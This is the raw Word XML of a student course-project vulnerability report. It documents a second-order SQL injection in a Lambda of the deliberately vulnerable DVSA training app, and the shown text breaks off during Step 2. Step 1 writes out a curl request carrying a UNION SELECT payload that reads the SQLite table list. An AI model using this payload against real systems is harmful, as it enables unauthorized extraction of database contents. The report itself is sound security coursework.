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C1D0" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2400" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Vulnerability Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E560D7F" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Second-Order SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26509F2C" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6C7086"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DVSA-GET-CART-TOTAL Lambda — ICS 344 Course Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7333F" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00A222B5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1A3A5C"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F75F70B" w14:textId="75F9CB19" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">•  Course / Section: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ICS 344 — Section </w:t>
      </w:r>
      <w:r w:rsidR="00901B50">
        <w:t>01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B931DEA" w14:textId="3F7DE76C" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">•  Student Name(s) + ID(s): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Faisal Alharbi — </w:t>
      </w:r>
      <w:r w:rsidR="00901B50">
        <w:t>s202261000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF6756" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">•  Your DVSA Website URL: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http://dvsa-faisalalharbi-ics344-project-716522590330-us-east-1.s3-website.us-east-1.amazonaws.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C5C131B" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">•  AWS Region: </w:t>
      </w:r>
      <w:r>
        <w:t>us-east-1 (N. Virginia)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355A384" w14:textId="5E18CB3B" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">•  Date: </w:t>
      </w:r>
      <w:r w:rsidR="00901B50">
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="00901B50" w:rsidRPr="00901B50">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00901B50">
        <w:t xml:space="preserve"> April 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576EB4FA" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">•  Vulnerability Title(s): </w:t>
      </w:r>
      <w:r>
        <w:t>Second-Order SQL Injection in DVSA-GET-CART-TOTAL Lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D21B33C" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5EB87" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Second-Order SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F894EA5" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6C7086"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Security Vulnerability Report — DVSA-GET-CART-TOTAL Lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419AD70C" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 1 — Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38CFA8" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This section documents an undocumented Second-Order SQL Injection within the serverless cart calculation workflow. The vulnerability resides in the DVSA-GET-CART-TOTAL Lambda function and its interaction with the SQLite inventory database. By injecting a malicious SQL payload during the initial order creation, an attacker can store the payload innocuously. When the billing phase is triggered, the backend unsafely concatenates this stored data into a new database query, allowing the attacker to extract database metadata and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bypass</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> intended application logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A835A3D" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 2 — Why This Works / Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29B9E3" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerability is rooted in unsafe string concatenation and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a failure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to re-validate data retrieved from internal storage. In distributed serverless architectures, developers often mistakenly assume that data read from an internal database is safe. When the billing request triggers the DVSA-GET-CART-TOTAL function, the Lambda retrieves the previously stored item ID (which contains the injected payload) and directly formats it into a SELECT statement without parameterization. This causes the payload to "wake up" and execute as a SQL command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD3099" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 3 — Environment and Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CE5697" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">Target API Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:t>https://[API_ID</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>].execute-api.us-east-1.amazonaws.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/dvsa/order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DCC61C" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Lambda Function: </w:t>
      </w:r>
      <w:r>
        <w:t>DVSA-GET-CART-TOTAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA8DF31" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">Log Group: </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lambda/DVSA-GET-CART-TOTAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6887050F" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used: </w:t>
      </w:r>
      <w:r>
        <w:t>curl, standard user JWT, AWS CloudWatch Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9FB60" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 4 — Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D4D12" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Plant the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D2720B" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initiate a new order using a valid JWT, passing a UNION SELECT payload as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>itemId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F38BA8"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="89B4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2B5" w14:paraId="1AB289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20" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="326E0D47" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="89B4FA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> -X POST </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"$API_URL"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43002B3E" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"Content-Type: application/</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7887CA2E" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"Authorization: $JWT_TOKEN"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="6C7086"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C642CB1"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d </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7A133E04" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "action": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"new"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F3F16BD"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cart</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-id": </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"hacked-cart-001"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42583118" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "items</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>": {</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4C6036CA" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      "1 UNION SELECT 1, GROUP_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CONCAT(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">name), 0 FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sqlite_master</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> WHERE type=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F9E2AF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'table'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="F38BA8"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>": 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2222D1C1"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
          <w:p w14:paraId="2CD5A1F2" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="A6E3A1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  }'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E584D45" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash — Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Injecting the UNION SELECT payload as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>itemId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a new order request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C993C57" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="761B7945" wp14:editId="17084621">
            <wp:extent cx="5334000" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="fig_terminal" descr="Screenshot of curl command" title="Bash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143000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAC9B24" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal Screenshot: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>curl request as seen in the Bash terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C87D22" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Add Shipping Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73755F02" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Advance the serverless pipeline by binding shipping data to the newly generated order-id:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F38BA8"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="89B4FA"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="89B4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2B5" w14:paraId="577E0E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20" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78CAD1E0" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
              <w:ind w:left="120" w:right="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="89B4FA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="CDD6F4"/>
